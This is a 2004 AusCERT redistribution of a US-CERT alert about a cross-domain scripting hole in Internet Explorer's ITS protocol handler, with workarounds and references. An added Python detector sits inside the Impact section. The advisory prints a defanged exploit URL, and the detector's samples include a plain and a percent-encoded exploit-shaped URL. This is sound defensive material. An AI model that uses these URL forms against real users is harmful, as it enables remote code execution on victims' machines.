===========================================================================
             AUSCERT External Security Bulletin Redistribution

               ESB-2004.0261 -- US-CERT Technical Cyber Security Alert TA04-099A
             Vulnerability in Internet Explorer ITS Protocol Handler
                               09 April 2004

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:                Internet Explorer
                        Any programs that use the WebBrowser ActiveX control
                        Any programs that use the IE HTML rendering engine
Publisher:              CERT/CC
Operating System:       Windows
Impact:                 Execute Arbitrary Code/Commands
Access Required:        Remote
CVE Names:              CAN-2004-0380

Ref:                    AU-2004.007

--------------------------BEGIN INCLUDED TEXT--------------------

Vulnerability in Internet Explorer ITS Protocol Handler

   Original release date: April 8, 2004
   Last revised: --
   Source: US-CERT

Systems Affected

     * Microsoft Windows systems running Internet Explorer

Overview

   A cross-domain scripting vulnerability in Microsoft Internet Explorer
   (IE) could allow an attacker to execute arbitrary code with the
   privileges of the user running IE. The attacker could also read and
   manipulate data on web sites in other domains or zones.

I. Description

   There is a cross-domain scripting vulnerability in the way ITS protocol
   handlers determine the security domain of an HTML component stored in a
   Compiled HTML Help (CHM) file. The HTML Help system "...uses the
   underlying components of Microsoft Internet Explorer to display help
   content. It supports HTML, ActiveX, Java, [and] scripting languages
   (JScript, and Microsoft Visual Basic Scripting Edition)." CHM files use
   the InfoTech Storage (ITS) format to store components such as HTML
   files, graphic files, and ActiveX objects. IE provides several protocol
   handlers that can access ITS files and individual CHM components: its:,
   ms-its:, ms-itss:, and mk:@MSITStore:.

   IE also has the ability to access parts of MIME Encapsulation of
   Aggregate HTML Documents (MHTML) using the mhtml: protocol handler. When
   IE references an inaccessible or non-existent MHTML file using the ITS
   and mhtml: protocols, the ITS protocol handlers can access a CHM file
   from an alternate source. IE incorrectly treats the CHM file as if it
   were in the same domain as the unavailable MHTML file. Using a specially
   crafted URL, an attacker can cause arbitrary script in a CHM file to be
   executed in a different domain, violating the cross-domain security
   model.

   Any programs that use the WebBrowser ActiveX control or the IE HTML
   rendering engine (MSHTML) may be affected by this vulnerability.
   Internet Explorer, Outlook, and Outlook Express are all examples of such
   programs. Any programs, including other web browsers, that use the IE
   protocol handlers (URL monikers) could function as attack vectors.
   Also, due to the way that IE determines MIME types, HTML and CHM files
   may not have the expected file name extensions (.htm/.html and .chm
   respectively).

   NOTE: Using an alternate web browser may not mitigate this
   vulnerability. It may be possible for a web browser other than IE on a
   Windows system to invoke IE to handle ITS protocol URLs.

   US-CERT is tracking this issue as VU#323070. This reference number
   corresponds to CVE candidate CAN-2004-0380.

II. Impact

   By convincing a victim to view an HTML document such as a web page or
   HTML email message, an attacker could execute script in a different
   security domain than the one containing the attacker's document. By
   causing script to be run in the Local Machine Zone, the attacker could
   execute arbitrary code with the privileges of the user running IE. The
   attacker could also read or modify data in other web sites (including
   reading cookies or content and modifying or creating content). Publicly
   available exploit code exists for this vulnerability.
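Detection logic for the URL shape the advisory describes (an ITS handler wrapped around an mhtml: reference, "!" separating the unavailable MHTML file from the alternate CHM source, and "::" selecting the HTML component inside that CHM), written as an added Python example that is not part of the US-CERT or AusCERT text. It decodes HTML entities and percent-encoding before matching, because encoded URLs can otherwise slip past content inspection; the sample message bodies and file names are constructed for the example.

```python
import html
import re
from urllib.parse import unquote

# ITS protocol handlers named in the advisory: its:, ms-its:, ms-itss: and
# mk:@MSITStore:. Longest names first so "ms-itss:" is not cut to "ms-its".
ITS_SCHEMES = ("mk:@msitstore", "ms-itss", "ms-its", "its")

# The advisory's pattern: an ITS scheme wrapped around an mhtml: reference,
# "!" separating the (unavailable) MHTML file from the alternate CHM source,
# and "::" selecting the HTML component inside that CHM.
ITS_MHTML_RE = re.compile(
    r"(?:" + "|".join(re.escape(s) for s in ITS_SCHEMES) + r"):\s*mhtml:"
    r"[^\s\"'<>]*?!(?P<chm>[^\s\"'<>]+?)::(?P<part>[^\s\"'<>]+)",
    re.IGNORECASE,
)

def normalize(text: str) -> str:
    """Peel off HTML entities and (repeated) percent-encoding, which the
    advisory notes can be used to evade content inspection, then fold case."""
    for _ in range(4):  # bounded: a few passes covers realistic nesting
        decoded = unquote(html.unescape(text))
        if decoded == text:
            break
        text = decoded
    return text.lower()

def find_its_mhtml(text: str) -> list[dict]:
    """Return one finding per ITS+mhtml URL found in the (maybe encoded) text."""
    return [
        {"url": m.group(0), "chm_source": m.group("chm"), "component": m.group("part")}
        for m in ITS_MHTML_RE.finditer(normalize(text))
    ]

# Constructed sample message bodies (not real captures). The first two carry
# the advisory's pattern, plain and encoded; the last two are benign lookalikes.
SAMPLES = {
    "plain": '<a href="ms-its:mhtml:file://C:\\nosuchfile.mht!http://www.example.com/sample.chm::/sample.html">',
    "encoded": 'href="&#109;s-its%3Amhtml%3Afile%3A//C%3A%5Cnosuchfile.mht%21http%3A//www.example.com/sample.chm%3A%3A/sample.html"',
    "help_link": '<a href="ms-its:C:\\Windows\\Help\\ntart.chm::/top.htm">',  # local help, no mhtml:
    "mhtml_only": '<a href="mhtml:file://C:\\archive.mht!http://www.example.com/page.htm">',  # no ITS wrapper
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        hits = find_its_mhtml(body)
        print(f"{name:10s} {'FLAG' if hits else 'ok  '} {[h['chm_source'] for h in hits]}")
```

Only the two ITS+mhtml samples are flagged; a plain local help link and a bare mhtml: reference are left alone, which keeps the rule usable on mail gateways and proxies without blocking ordinary Help traffic.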
   US-CERT has monitored incident reports that indicate that this
   vulnerability is being exploited. The Ibiza trojan, variants of
   W32/Bugbear, and BloodHound.Exploit.6 are some examples of malicious
   code that exploit this vulnerability. It is important to note that any
   arbitrary executable payload could be delivered via this vulnerability,
   and different anti-virus vendors may identify malicious code with
   different names.

   A malicious web site or email message may contain HTML similar to the
   following:

     ms-_its:mhtml:file://C:\nosuchfile_mht!http://www.example.com//exploit_chm::exploit_html

   (This URL is intentionally modified to avoid detection by anti-virus
   software.)

   In this example, HTML and script in exploit.html will be executed in
   the security context of the Local Machine Zone. It is common practice
   for exploit.html to either contain or download an executable payload
   such as a backdoor, trojan horse, virus, bot, or other malicious code.
   Note that it is possible to encode a URL in an attempt to bypass HTTP
   content inspection or anti-virus software.

III. Solution

   Currently, there is no complete solution for this vulnerability. Until
   a patch is available, consider the workarounds listed below.

Disable ITS protocol handlers

   Disabling ITS protocol handlers appears to prevent exploitation of this
   vulnerability. Delete or rename the following registry keys:

     HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\{ms-its,ms-itss,its,mk}

   Disabling these protocol handlers will significantly reduce the
   functionality of the Windows Help system and may have other unintended
   consequences. Plan to undo these changes after patches have been tested
   and installed.

Follow good Internet security practices

   These recommended security practices will help to reduce exposure to
   attacks and mitigate the impact of cross-domain vulnerabilities.
     * Disable Active scripting and ActiveX controls

       NOTE: Disabling Active scripting and ActiveX controls will not
       prevent the exploitation of this vulnerability.

       Disabling Active scripting and ActiveX controls in the Internet and
       Local Machine Zones may stop certain types of attacks and will
       prevent exploitation of different cross-domain vulnerabilities.
       Disable Active scripting and ActiveX controls in any zones used to
       read HTML email. Disabling Active scripting and ActiveX controls in
       the Local Machine Zone will prevent malicious code that requires
       Active scripting and ActiveX controls from running. Changing these
       settings may reduce the functionality of scripts, applets, Windows
       components, or other applications. See Microsoft Knowledge Base
       Article 833633 for detailed information about security settings
       for the Local Machine Zone. Note that Service Pack 2 for Windows XP
       includes these changes.

     * Do not follow unsolicited links

       Do not click on unsolicited URLs received in email, instant
       messages, web forums, or Internet relay chat (IRC) channels.

     * Maintain updated anti-virus software

       Anti-virus software with updated virus definitions may identify and
       prevent some exploit attempts. Variations of exploits or attack
       vectors may not be detected. Do not rely solely on anti-virus
       software to defend against this vulnerability. More information
       about viruses and anti-virus vendors is available on the US-CERT
       Computer Virus Resources page.

Appendix B. References

     * Vulnerability Note VU#323070 -
       <http://www.kb.cert.org/vuls/id/323070>
     * US-CERT Computer Virus Resources -
       <http://www.us-cert.gov/other_sources/viruses.html>
     * CVE CAN-2004-0380 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0380>
     * Introduction to URL Security Zones -
       <http://msdn.microsoft.com/workshop/security/szone/overview/overview.asp>
     * About Cross-Frame Scripting and Security -
       <http://msdn.microsoft.com/workshop/author/om/xframe_scripting_security.asp>
     * MIME Type Determination in Internet Explorer -
       <http://msdn.microsoft.com/workshop/networking/moniker/overview/appendix_a.asp>
     * URL Monikers -
       <http://msdn.microsoft.com/workshop/networking/moniker/monikers.asp>
     * Asynchronous Pluggable Protocols -
       <http://msdn.microsoft.com/workshop/networking/pluggable/pluggable.asp>
     * Microsoft HTML Help 1.4 SDK -
       <http://msdn.microsoft.com/library/en-us/htmlhelp/html/vsconHH1Start.asp>
     * Microsoft Knowledge Base Article 182569 -
       <http://support.microsoft.com/default.aspx?scid=182569>
     * Microsoft Knowledge Base Article 174360 -
       <http://support.microsoft.com/default.aspx?scid=174360>
     * Microsoft Knowledge Base Article 833633 -
       <http://support.microsoft.com/default.aspx?scid=833633>
     * Windows XP Service Pack 2 Technical Preview -
       <http://www.microsoft.com/technet/prodtechnol/winxppro/sp2preview.mspx>
     * AusCERT Update AU-2004.007 -
       <http://www.auscert.org.au/3990>
   _________________________________________________________________

   This vulnerability was reported by Thor Larholm.
   _________________________________________________________________

   Feedback can be directed to the author: Art Manion.
   _________________________________________________________________

   Copyright 2004 Carnegie Mellon University.
   Terms of use: <http://www.us-cert.gov/legal.html>

Revision History

   April 8, 2004: Initial release

--------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to
auscert@auscert.org.au and we will forward your request to the
appropriate person.

This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no
control over its content. The decision to follow or act on information or
advice contained in this security bulletin is the responsibility of each
user or organisation, and should be considered in accordance with your
organisation's site policies and procedures. AusCERT takes no
responsibility for consequences which may arise from following or acting
on information or advice contained in this security bulletin.

NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at a
later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still
current.

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved
from:

        http://www.auscert.org.au/render.html?cid=1980

If you believe that your computer system has been compromised or attacked
in any way, we encourage you to let us know by completing the secure
National IT Incident Reporting Form at:

        http://www.auscert.org.au/render.html?it=3192

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.